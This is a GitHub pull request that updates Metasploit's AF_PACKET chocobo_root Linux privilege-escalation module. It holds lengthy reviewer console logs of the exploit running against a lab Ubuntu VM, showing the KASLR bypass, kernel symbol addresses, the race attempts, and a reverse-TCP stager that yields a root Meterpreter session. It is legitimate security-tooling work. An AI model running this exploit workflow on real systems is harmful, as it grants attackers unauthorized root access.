Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update AF_PACKET chocobo_root Privilege Escalation module #12859

Merged
merged 1 commit into from Jan 24, 2020

Conversation

@bcoles
Copy link
Contributor

bcoles commented Jan 19, 2020

Update AF_PACKET chocobo_root Privilege Escalation module

  • Uses the new Msf::Post::Linux::Compile mixin
  • Updates the chocobo_root.c C exploit code (and associated pre-compiled executable), which contains new targets for lowlatency kernels and some small changes.
  • Add notes about cross-compiling to documentation.
  • Updates the check method to search the C code for target kernel versions, ensuring a 1 to 1 mapping between the Metasploit module and the C exploit.
@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Jan 24, 2020

I may have done something silly but I can't get the original exploit to work:

  1. Installed Ubuntu 16.04.4 desktop amd64 in Virtualbox.
  2. Installed an older kernel: sudo apt install linux-image-4.4.0-51-generic
  3. Enabled 2 cpus in Virtualbox
  4. Hold shift during boot, selected older kernel
  5. Get a session, set SESSION -1
msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > set COMPILE False
COMPILE => False
msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > run

[*] Started reverse TCP handler on 192.168.43.200:4445
[+] Linux kernel version 4.4.0-51-generic is vulnerable
[+] SMAP is not enabled
[+] System architecture x86_64 is supported
[+] System has 2 CPU cores
[+] Kernel config has CONFIG_USER_NS enabled
[+] Unprivileged user namespaces are permitted
[+] LKRG is not installed
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.QvImJ02' (83976 bytes) ...
[*] Writing '/tmp/.XipOi' (250 bytes) ...
[*] Launching exploit (Timeout: 600)...

Running the exploit manually gives me:

user@user-VirtualBox:~$ /tmp/.oqQnPD
linux AF_PACKET race condition exploit by rebel
[.] starting
[.] checking hardware
[.] system has 2 processor cores
[~] done, hardware looks good
[.] checking kernel version
[.] kernel version '4.4.0-51-generic #72-Ubuntu' detected
[~] done, version looks good
[.] KASLR bypass enabled, getting kernel base address
[.] trying /proc/kallsyms...
[.] trying /boot/System.map-4.4.0-51-generic...
[-] open/read(/boot/System.map-4.4.0-51-generic)
[.] trying syslog...
[~] done, kernel text:     ffffffff81000000
[.] proc_dostring:         ffffffff81088090
[.] modprobe_path:         ffffffff81e48f80
[.] register_sysctl_table: ffffffff812879a0
[.] set_memory_rw:         ffffffff8106f320
[.] setting up namespace sandbox
[~] done, namespace sandbox set up
[.] making vsyscall page writable...

[.] new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
[.] done, sockets allocated
[.] removing barrier and spraying...
[.] version switcher stopping, x = -1 (y = 55451, last val = 0)
[.] current packet version = 2
[.] pbd->hdr.bh1.offset_to_first_pkt = 48
[-] race not won

[.] retrying stage...
[.] new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
[.] done, sockets allocated
[.] removing barrier and spraying...
[.] version switcher stopping, x = -1 (y = 98089, last val = 0)
[.] current packet version = 2
[.] pbd->hdr.bh1.offset_to_first_pkt = 48
[-] race not won

[.] retrying stage...
[.] new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
[.] done, sockets allocated
[.] removing barrier and spraying...
[.] version switcher stopping, x = -1 (y = 102209, last val = 0)
[.] current packet version = 2
[.] pbd->hdr.bh1.offset_to_first_pkt = 48
[-] race not won

[.] retrying stage...
[.] new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
[.] done, sockets allocated
[.] removing barrier and spraying...
[.] version switcher stopping, x = -1 (y = 134093, last val = 2)
[.] current packet version = 0
[.] pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*

[!] please wait up to a few minutes for timer to be executed.
[!] if you ctrl-c now the kernel will hang. so don't do that.

[.] closing socket and verifying...
[~] vsyscall page altered!
(Virtual machine freezes)
Connection to localhost closed by remote host.
Connection to localhost closed.

@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Jan 24, 2020

It "worked" eventually:


msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > run

[*] Started reverse TCP handler on 192.168.43.200:4445
[+] Linux kernel version 4.4.0-51-generic is vulnerable
[+] SMAP is not enabled
[+] System architecture x86_64 is supported
[+] System has 2 CPU cores
[+] Kernel config has CONFIG_USER_NS enabled
[+] Unprivileged user namespaces are permitted
[+] LKRG is not installed
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.qguB6VP0n' (83976 bytes) ...
[*] Writing '/tmp/.uixrl9ZBhd' (250 bytes) ...
[*] Launching exploit (Timeout: 600)...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 192.168.43.200
[*] linux AF_PACKET race condition exploit by rebel
[*] [.] starting
[*] [.] checking hardware
[*] [.] system has 2 processor cores
[*] [~] done, hardware looks good
[*] [.] checking kernel version
[*] [.] kernel version '4.4.0-51-generic #72-Ubuntu' detected
[*] [~] done, version looks good
[*] [.] KASLR bypass enabled, getting kernel base address
[*] [.] trying /proc/kallsyms...
[*] [.] trying /boot/System.map-4.4.0-51-generic...
[*] [-] open/read(/boot/System.map-4.4.0-51-generic)
[*] [.] trying syslog...
[*] [~] done, kernel text:     ffffffff81000000
[*] [.] proc_dostring:         ffffffff81088090
[*] [.] modprobe_path:         ffffffff81e48f80
[*] [.] register_sysctl_table: ffffffff812879a0
[*] [.] set_memory_rw:         ffffffff8106f320
[*] [.] setting up namespace sandbox
[*] [~] done, namespace sandbox set up
[*] [.] making vsyscall page writable...
[*]
[*] [.] new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
[*] [.] done, sockets allocated
[*] [.] removing barrier and spraying...
[*] [.] version switcher stopping, x = -1 (y = 78819, last val = 2)
[*] [.] current packet version = 0
[*] [.] pbd->hdr.bh1.offset_to_first_pkt = 0
[*] [-] race not won
[*] [.] starting
[*] [.] checking hardware
[*] [.] system has 2 processor cores
[*] [~] done, hardware looks good
[*] [.] checking kernel version
[*] [.] kernel version '4.4.0-51-generic #72-Ubuntu' detected
[*] [~] done, version looks good
[*] [.] KASLR bypass enabled, getting kernel base address
[*] [.] trying /proc/kallsyms...
[*] [.] trying /boot/System.map-4.4.0-51-generic...
[*] [-] open/read(/boot/System.map-4.4.0-51-generic)
[*] [.] trying syslog...
[*] [~] done, kernel text:     ffffffff81000000
[*] [.] proc_dostring:         ffffffff81088090
[*] [.] modprobe_path:         ffffffff81e48f80
[*] [.] register_sysctl_table: ffffffff812879a0
[*] [.] set_memory_rw:         ffffffff8106f320
[*] [.] setting up namespace sandbox
[*] [~] done, namespace sandbox set up
[*] [.] making vsyscall page writable...
[*]
[*]
[*] [.] retrying stage...
[*] [.] new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
[*] [.] done, sockets allocated
[*] [.] removing barrier and spraying...
[*] [.] version switcher stopping, x = -1 (y = 142865, last val = 2)
[*] [.] current packet version = 0
[*] [.] pbd->hdr.bh1.offset_to_first_pkt = 48
[*] *=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
[*]
[*] [!] please wait up to a few minutes for timer to be executed.
[*] [!] if you ctrl-c now the kernel will hang. so don't do that.
[*]
[*] [.] closing socket and verifying...
[*] [~] vsyscall page altered!
[*] [.] starting
[*] [.] checking hardware
[*] [.] system has 2 processor cores
[*] [~] done, hardware looks good
[*] [.] checking kernel version
[*] Meterpreter session 17 opened (192.168.43.200:4445 -> 192.168.43.200:34360) at 2020-01-24 16:17:47 +0800
[*] [.] kernel version '4.4.0-51-generic #72-Ubuntu' detected
[*] [~] done, version looks good
[*] [.] KASLR bypass enabled, getting kernel base address
[*] [.] trying /proc/kallsyms...
[*] [.] trying /boot/System.map-4.4.0-51-generic...
[*] [-] open/read(/boot/System.map-4.4.0-51-generic)
[*] [.] trying syslog...
[*] [~] done, kernel text:     ffffffff81000000
[*] [.] proc_dostring:         ffffffff81088090
[*] [.] modprobe_path:         ffffffff81e48f80
[*] [.] register_sysctl_table: ffffffff812879a0
[*] [.] set_memory_rw:         ffffffff8106f320
[*] [.] setting up namespace sandbox
[*] [~] done, namespace sandbox set up
[*] [.] making vsyscall page writable...
[*]
[*]
[*] [.] retrying stage...
[*]
[*] [~] done, stage 1 completed
[*] [.] registering new sysctl...
[*]
[*] [.] new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
[*] [.] done, sockets allocated
[*] [.] removing barrier and spraying...
[*] [.] version switcher stopping, x = -1 (y = 171017, last val = 0)
[*] [.] current packet version = 2
[*] [.] pbd->hdr.bh1.offset_to_first_pkt = 65584
[*] [-] race not won
[*] [.] starting
[*] [.] checking hardware
[*] [.] system has 2 processor cores
[*] [~] done, hardware looks good
[*] [.] checking kernel version
[*] [.] kernel version '4.4.0-51-generic #72-Ubuntu' detected
[*] [~] done, version looks good
[*] [.] KASLR bypass enabled, getting kernel base address
[*] [.] trying /proc/kallsyms...
[*] [.] trying /boot/System.map-4.4.0-51-generic...
[*] [-] open/read(/boot/System.map-4.4.0-51-generic)
[*] [.] trying syslog...
[*] [~] done, kernel text:     ffffffff81000000
[*] [.] proc_dostring:         ffffffff81088090
[*] [.] modprobe_path:         ffffffff81e48f80
[*] [.] register_sysctl_table: ffffffff812879a0
[*] [.] set_memory_rw:         ffffffff8106f320
[*] [.] setting up namespace sandbox
[*] [~] done, namespace sandbox set up
[*] [.] making vsyscall page writable...
[*]
[*]
[*] [.] retrying stage...
[*]
[*] [~] done, stage 1 completed
[*] [.] registering new sysctl...
[*]
[*]
[*] [.] retrying stage...
[*] [.] new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
[*] [.] done, sockets allocated
[*] [.] removing barrier and spraying...
[*] [.] version switcher stopping, x = -1 (y = 152519, last val = 0)
[*] [.] current packet version = 2
[*] [.] pbd->hdr.bh1.offset_to_first_pkt = 48
[*] [-] race not won
[*] [.] starting
[*] [.] checking hardware
[*] [.] system has 2 processor cores
[*] [~] done, hardware looks good
[*] [.] checking kernel version
[*] [.] kernel version '4.4.0-51-generic #72-Ubuntu' detected
[*] [~] done, version looks good
[*] [.] KASLR bypass enabled, getting kernel base address
[*] [.] trying /proc/kallsyms...
[*] [.] trying /boot/System.map-4.4.0-51-generic...
[*] [-] open/read(/boot/System.map-4.4.0-51-generic)
[*] [.] trying syslog...
[*] [~] done, kernel text:     ffffffff81000000
[*] [.] proc_dostring:         ffffffff81088090
[*] [.] modprobe_path:         ffffffff81e48f80
[*] [.] register_sysctl_table: ffffffff812879a0
[*] [.] set_memory_rw:         ffffffff8106f320
[*] [.] setting up namespace sandbox
[*] [~] done, namespace sandbox set up
[*] [.] making vsyscall page writable...
[*]
[*]
[*] [.] retrying stage...
[*]
[*] [~] done, stage 1 completed
[*] [.] registering new sysctl...
[*]
[*]
[*] [.] retrying stage...
[*]
[*] [.] retrying stage...
[*] [.] new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
[*] [.] done, sockets allocated
[*] [.] removing barrier and spraying...
[*] [.] version switcher stopping, x = .....-1 (y = 329915, last val = 2)
[*] [.] current packet version = 0
[*] [.] pbd->hdr.bh1.offset_to_first_pkt = 48
[*] *=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
[*]
[*] [!] please wait up to a few minutes for timer to be executed.
[*] [!] if you ctrl-c now the kernel will hang. so don't do that.
[*]
[*] [.] closing socket and verifying...
[*] [~] sysctl added!
[*] [.] starting
[*] [.] checking hardware
[*] [.] system has 2 processor cores
[*] [~] done, hardware looks good
[*] [.] checking kernel version
[*] [.] kernel version '4.4.0-51-generic #72-Ubuntu' detected
[*] [~] done, version looks good
[*] [.] KASLR bypass enabled, getting kernel base address
[*] [.] trying /proc/kallsyms...
[*] [.] trying /boot/System.map-4.4.0-51-generic...
[*] [-] open/read(/boot/System.map-4.4.0-51-generic)
[*] [.] trying syslog...
[*] [~] done, kernel text:     ffffffff81000000
[*] [.] proc_dostring:         ffffffff81088090
[*] [.] modprobe_path:         ffffffff81e48f80
[*] [.] register_sysctl_table: ffffffff812879a0
[*] [.] set_memory_rw:         ffffffff8106f320
[*] [.] setting up namespace sandbox
[*] [~] done, namespace sandbox set up
[*] [.] making vsyscall page writable...
[*]
[*]
[*] [.] retrying stage...
[*]
[*] [~] done, stage 1 completed
[*] [.] registering new sysctl...
[*]
[*]
[*] [.] retrying stage...
[*]
[*] [.] retrying stage...
[*]
[*] [~] done, stage 2 completed
[*] Cleaning up /tmp/.uixrl9ZBhd and /tmp/.qguB6VP0n..
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_fs_delete_file: Operation failed: 1
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                           Connection
  --  ----  ----                   -----------                                           ----------
  16        meterpreter x64/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ 10.0.2.15  192.168.43.200:4444 -> 192.168.43.200:51644 (10.0.2.15)
  17        meterpreter x64/linux  uid=0, gid=0, euid=0, egid=0 @ 10.0.2.15              192.168.43.200:4445 -> 192.168.43.200:34360 (10.0.2.15)

msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > sessions 17

@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Jan 24, 2020

The changes look good (and have no effect on the reliability issue above). Nice work @bcoles

@timwr timwr self-assigned this Jan 24, 2020
@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Jan 24, 2020

@timwr the exploit was never 100% reliable, although it's a little disconcerting that it failed on your first attempt.

The changes I made shouldn't have affected the reliability, but I'm willing to admit I may have done something stupid or overlooked something. The changes are mostly style related, plus some new targets and KASLR bypass, which shouldn't affect memory layout.

timwr added a commit that referenced this pull request Jan 24, 2020
@timwr timwr merged commit 19b1f56 into rapid7:master Jan 24, 2020
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@bcoles bcoles deleted the bcoles:af_packet_chocobo_root_priv_esc branch Jan 24, 2020
@tperry-r7

This comment has been minimized.

Copy link
Contributor

tperry-r7 commented Feb 4, 2020

Release Notes

This updated the AF_PACKET chocobo_root Privilege Escalation module.

  • Uses the new Msf::Post::Linux::Compile mixin
  • Updates the chocobo_root.c C exploit code and associated pre-compiled executable, which contains new targets for low latency kernels and other changes.
  • Updates the check method to search the C code for target kernel versions, ensuring a 1 to 1 mapping between the Metasploit module and the C exploit.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

3 participants
You can’t perform that action at this time.